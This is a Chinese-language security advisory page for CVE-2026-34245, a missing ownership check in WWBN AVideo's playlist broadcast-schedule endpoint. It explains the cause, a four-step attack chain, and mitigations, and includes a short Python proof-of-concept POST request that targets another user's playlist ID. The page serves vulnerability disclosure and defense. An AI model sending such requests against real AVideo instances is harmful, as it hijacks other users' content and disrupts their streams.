IPBUF安全漏洞报告
English
CVE-2026-34245 CVSS 6.3 中危

CVE-2026-34245 AVideo权限绕过致内容劫持漏洞

披露日期: 2026-03-27

漏洞信息

漏洞编号
CVE-2026-34245
漏洞类型
权限提升
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

权限提升访问控制失效WWBN AVideo越权访问内容劫持

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及以下版本中,系统存在权限验证逻辑漏洞。任何拥有流媒体权限的认证用户均可利用`Playlists_schedules`模块的接口,创建或修改指向任意播放列表的广播计划,从而绕过所有权校验机制。该漏洞允许攻击者在计划触发时,以受害播放列表所有者的身份执行重播操作,进而劫持内容并中断正常流媒体服务。

技术细节

该漏洞根源于WWBN AVideo在`plugin/PlayLists/View/Playlists_schedules/add.json.php`接口处的访问控制逻辑缺失。系统在处理广播计划的创建与修改请求时,仅校验了用户是否具备基础的“流媒体权限”,而未对请求参数中的`playlists_id`进行所有权校验。这意味着,拥有普通流媒体权限的攻击者可以通过遍历ID或猜测ID,将广播目标指向其他用户的私有播放列表。由于定时任务机制在执行重播时,继承了播放列表所有者的系统身份,而非任务发起者的身份,导致攻击者能够利用这一逻辑缺陷,在特定时间点以受害者身份恶意重播内容。这种越权访问不仅破坏了数据的完整性,还可能导致敏感信息的非授权泄露及服务可用性下降。

攻击链分析

STEP 1
步骤1:信息收集
攻击者确认目标平台使用WWBN AVideo且版本低于或等于26.0,并获取一个具有流媒体权限的低权限账户。
STEP 2
步骤2:权限绕过
攻击者向`add.json.php`端点发送POST请求,在参数中指定受害者的播放列表ID,系统因未校验所有权而允许创建计划。
STEP 3
步骤3:等待触发
攻击者设定广播计划的时间,等待系统定时任务到达指定时间点。
STEP 4
步骤4:执行攻击
系统以受害者(播放列表所有者)的身份执行重播任务,导致内容被劫持或服务中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL, replace with actual instance url = "https://target-site.com/plugin/PlayLists/View/Playlists_schedules/add.json.php" # Attacker's cookie (requires valid session with streaming permission) cookies = { "PHPSESSID": "attacker_valid_session_id" } # Payload to hijack a specific playlist (ID: 1234) payload = { "playlists_id": "1234", # ID of the victim's playlist "start_time": "2026-04-01 12:00:00", "end_time": "2026-04-01 13:00:00", "re_broadcast": "1" } try: response = requests.post(url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] PoC request sent successfully. Check if schedule was created.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
建议立即升级官方修复版本。若无法立即升级,应临时禁用PlayLists插件或通过WAF规则拦截对`add.json.php`接口的请求,并严格审查拥有流媒体权限的用户列表。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表